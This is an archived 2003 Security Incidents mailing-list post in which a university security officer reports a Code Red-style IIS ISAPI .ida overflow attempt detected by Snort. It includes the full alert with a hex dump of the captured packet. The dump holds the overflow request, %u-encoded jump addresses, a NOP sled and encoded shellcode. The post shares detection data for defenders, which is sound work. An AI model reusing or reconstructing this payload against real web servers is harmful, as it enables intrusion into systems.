Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

FYI - different ISAPI .ida exploit

From: Russell Fulton <r.fulton () auckland ac nz>
Date: Mon, 20 Oct 2003 09:38:11 +1300
Hi All,
        Snort picked this up today; one host delivered 50 of these to 3 (UNIX
based ;) web servers in our network.  It appears to be a code red style
exploit but I have not seen one padded with 'C's before.

BTW I notice that standard code red and nimda exploits are way down
following the massive patching effort prompted by Blaster.  As the
saying goes "Every cloud has a siver lining" ;)

Cheers, Russell. 
-- 
Russell Fulton, Network Security Officer, The University of Auckland,
New Zealand.

Generated by ACID v0.9.6b23 on Mon, 20 Oct 2003 08:28:42 +1300

------------------------------------------------------------------------------
#(1 - 135940) [2003-10-20 03:08:31] [cve/CAN-2000-0071] [icat/CAN-2000-0071] [bugtraq/1065] [arachnids/552] 
[snort/1243]  WEB-IIS ISAPI .ida attempt
IPv4: 218.108.40.115 -> 202.37.88.21
      hlen=5 TOS=0 dlen=1500 ID=55937 flags=2 offset=0 TTL=108 chksum=2432
TCP:  port=2601 -> dport: 80  flags=***A**** seq=313304431
      ack=3639528427 off=5 res=0 win=17520 urp=0 chksum=55493
Payload:  length = 1460

000 : 47 45 54 20 2F 4E 55 4C 4C 2E 49 44 41 3F 43 43   GET /NULL.IDA?CC
010 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
020 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
030 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
040 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
050 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
060 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
070 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
080 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
090 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
0a0 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
0b0 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
0c0 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
0d0 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
0e0 : 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43   CCCCCCCCCCCCCCCC
0f0 : 43 43 43 43 43 43 25 75 30 61 65 62 25 75 62 38   CCCCCC%u0aeb%ub8
100 : 39 30 25 75 64 61 63 66 25 75 37 37 65 65 25 75   90%udacf%u77ee%u
110 : 30 30 30 30 25 75 30 30 30 30 25 75 38 33 38 62   0000%u0000%u838b
120 : 25 75 30 30 39 34 25 75 30 30 30 30 25 75 34 30   %u0094%u0000%u40
130 : 38 62 25 75 30 35 36 34 25 75 30 31 35 30 25 75   8b%u0564%u0150%u
140 : 30 30 30 30 25 75 65 30 66 66 25 75 39 30 39 30   0000%ue0ff%u9090
150 : 3D 78 26 90 90 90 90 90 90 90 90 90 90 90 90 90   =x&.............
160 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
170 : 90 90 90 EB 09 90 90 90 5F EB 08 90 90 90 E8 F5   ........_.......
180 : FF FF FF 8D 6F F0 8D 7D 2D 90 90 90 8B F7 66 B8   ....o..}-.....f.
190 : 48 06 33 C9 66 8B C8 B4 99 FC AC 32 C4 AA E2 FA   H.3.f......2....
1a0 : 14 24 EC 9F 99 99 65 AA 50 28 B9 29 BD 6B 37 5F   .$....e.P(.).k7_
1b0 : DE 66 99 71 94 9D 99 99 71 16 9D 99 99 71 D7 9B   .f.q....q....q..
1c0 : 99 99 10 1C DA 9C 99 99 71 C8 9B 99 99 71 BD 9A   ........q....q..
1d0 : 99 99 10 1C DE 9C 99 99 71 27 98 99 99 10 1C D6   ........q'......
1e0 : 9C 99 99 12 1C DE 9C 99 99 71 E6 9B 99 99 10 1C   .........q......
1f0 : D2 9C 99 99 71 C7 99 99 99 71 08 99 99 99 1A 61   ....q....q.....a
200 : 99 ED 79 12 1C D2 9C 99 99 C9 66 0C 94 9F 99 99   ..y.......f.....
210 : 12 1C DE 9C 99 99 C9 66 0C 94 9F 99 99 12 1C B6   .......f........
220 : 9C 99 99 C9 66 0C 1F 9C 99 99 12 1C A2 9C 99 99   ....f...........
230 : C9 66 0C 1F 9C 99 99 21 99 99 99 99 C9 12 1C D6   .f.....!........
240 : 9C 99 99 C9 66 0C 5C 9C 99 99 21 99 99 99 99 C9   ....f.\...!.....
250 : 66 0C 4F 9C 99 99 5A 12 1C D2 9C 99 99 F3 99 F3   f.O...Z.........
260 : 80 14 1C 9A 98 99 99 C9 12 1C D2 9C 99 99 C9 66   ...............f
270 : 0C 9A 9F 99 99 5A 94 93 CE F0 F7 F7 ED D8 EC ED   .....Z..........
280 : F6 D8 ED ED F8 FA F2 B9 CF AB A9 94 93 94 93 F1   ................
290 : 09 99 99 99 66 0C 26 9C 99 99 12 1C B6 9C 99 99   ....f.&.........
2a0 : 71 5F 99 99 99 1A 61 66 96 1D 2F 99 99 99 1A 61   q_....af../....a
2b0 : 99 ED CE 09 09 09 09 F3 99 14 1C A6 9C 99 99 C9   ................
2c0 : F1 99 9D 99 99 12 1C DA 9C 99 99 C9 12 1C B6 9C   ................
2d0 : 99 99 C9 66 0C 2F 9C 99 99 1A 61 99 96 1D 1B 99   ...f./....a.....
2e0 : 99 99 F3 99 12 1C A6 9C 99 99 C9 12 1C DA 9C 99   ................
2f0 : 99 C9 12 1C D2 9C 99 99 C9 66 0C 9A 9F 99 99 1A   .........f......
300 : 61 66 ED FD 09 09 09 09 72 1C F3 99 F1 99 9D 99   af......r.......
310 : 99 12 1C DA 9C 99 99 C9 12 1C D2 9C 99 99 C9 66   ...............f
320 : 0C 91 9F 99 99 1A 61 99 ED A7 09 09 09 09 1A 61   ......a........a
330 : 66 ED AC 09 09 09 09 AA 42 CA 14 04 A6 9C 99 99   f.......B.......
340 : CA C9 12 1C DA 9C 99 99 C9 12 1C A2 9C 99 99 C9   ................
350 : 66 0C 35 9C 99 99 1A 61 99 ED 90 09 09 09 09 70   f.5....a.......p
360 : B2 66 66 66 AA 59 D1 5A AA 59 5A AA 42 CA 14 04   .fff.Y.Z.YZ.B...
370 : BD 9B 99 99 CA AA 42 CA CA CA C9 66 0C 0B 9C 99   ......B....f....
380 : 99 1A 61 99 ED 92 09 09 09 09 12 1C BD 9B 99 99   ..a.............
390 : 5A 21 66 66 66 66 5A 99 99 99 99 12 1C DA 9C 99   Z!ffffZ.........
3a0 : 99 5E 99 DD 99 99 99 C9 66 0C FE 9C 99 99 12 04   .^......f.......
3b0 : DA 9C 99 99 12 1C AA 9C 99 99 10 DA D9 10 DA A5   ................
3c0 : 12 1C AE 9C 99 99 10 DA A1 21 98 98 99 99 10 DA   .........!......
3d0 : B5 CA CA AA 59 C9 C9 C9 D9 C9 D1 C9 C9 14 1C EC   ....Y...........
3e0 : 9F 99 99 C9 AA 59 C9 66 0C EE 9C 99 99 12 1C AA   .....Y.f........
3f0 : 9C 99 99 C9 66 0C 1F 9C 99 99 12 1C AE 9C 99 99   ....f...........
400 : C9 66 0C 1F 9C 99 99 12 1C DA 9C 99 99 12 99 5A   .f.............Z
410 : F1 99 9D 99 99 F3 D9 66 0C 39 9C 99 99 5A AA 59   .......f.9...Z.Y
420 : C9 14 1C 77 9B 99 99 5E 99 95 99 99 99 C9 14 1C   ...w...^........
430 : AA 9C 99 99 C9 14 1C B6 9C 99 99 C9 66 0C C5 9C   ............f...
440 : 99 99 AA 59 C9 14 1C 77 9B 99 99 C9 14 1C A2 9C   ...Y...w........
450 : 99 99 C9 14 1C AE 9C 99 99 C9 66 0C C5 9C 99 99   ..........f.....
460 : 5A 99 99 99 99 99 99 99 99 98 99 99 99 C9 14 04   Z...............
470 : B8 9A 99 99 5E 9A 89 99 99 99 CA 14 04 DB 9D 99   ....^...........
480 : 99 CA C9 66 0C 65 9C 99 99 12 41 1A 61 99 C1 E5   ...f.e....A.a...
490 : 45 12 5A 5A 89 99 99 99 F3 8A 14 1C F6 9A 99 99   E.ZZ............
4a0 : C9 66 0C BD 9F 99 99 14 1C F6 9A 99 99 C9 66 0C   .f............f.
4b0 : A9 9F 99 99 1A 61 99 ED BB 09 09 09 09 12 E9 95   .....a..........
4c0 : 12 67 65 34 1A 61 99 ED 8A 09 09 09 09 12 99 A5   .ge4.a..........
4d0 : 93 ED 69 A5 59 ED 75 A5 35 ED 71 5A 12 6E 34 12   ..i.Y.u.5.qZ.n4.
4e0 : 99 5A 99 99 99 99 99 99 99 99 99 99 99 99 99 99   .Z..............
4f0 : 99 99 99 99 99 99 12 1C DA 9C 99 99 C9 F3 9B 66   ...............f
500 : 0C 80 9F 99 99 F3 99 F3 98 F3 9B 66 0C 70 9C 99   ...........f.p..
510 : 99 1A 61 66 96 1D 01 99 99 99 10 1C DE 9C 99 99   ..af............
520 : 14 04 A6 9C 99 99 5E 9A 98 99 99 99 F3 9D CA F3   ......^.........
530 : 9D F1 66 66 99 99 C9 66 0C A7 9F 99 99 1A 61 99   ..ff...f......a.
540 : EC E9 09 09 09 09 FF 12 1C F6 9F 99 99 FF 10 1C   ................
550 : DD 9D 99 99 12 1C E8 9F 99 99 10 1C DF 9D 99 99   ................
560 : 1A 61 66 EC 96 09 09 09 09 71 B3 66 66 66 10 1C   .af......q.fff..
570 : DF 9D 99 99 12 1C DE 9C 99 99 F3 89 14 04 DB 9D   ................
580 : 99 99 CA C9 66 0C 69 9C 99 99 1A 61 99 EC BA 09   ....f.i....a....
590 : 09 09 09 F3 9C 12 1C DE 9C 99 99 C9 66 0C 6C 9C   ............f.l.
5a0 : 99 99 1A 61 99 EC 92 09 09 09 09 12 1C DE 9C 99   ...a............
5b0 : 99 5A AA 59                                       .Z.Y



---------------------------------------------------------------------------
FREE Whitepaper: Better Management for Network Security

Looking for a better way to manage your IP security?
Learn how Solsoft can help you:
- Ensure robust IP security through policy-based management
- Make firewall, VPN, and NAT rules interoperable across heterogeneous
networks
- Quickly respond to network events from a central console

Download our FREE whitepaper at:
http://www.securityfocus.com/sponsor/Solsoft_incidents_031015
----------------------------------------------------------------------------
Previous By Date Next
Previous By Thread Next

Current thread: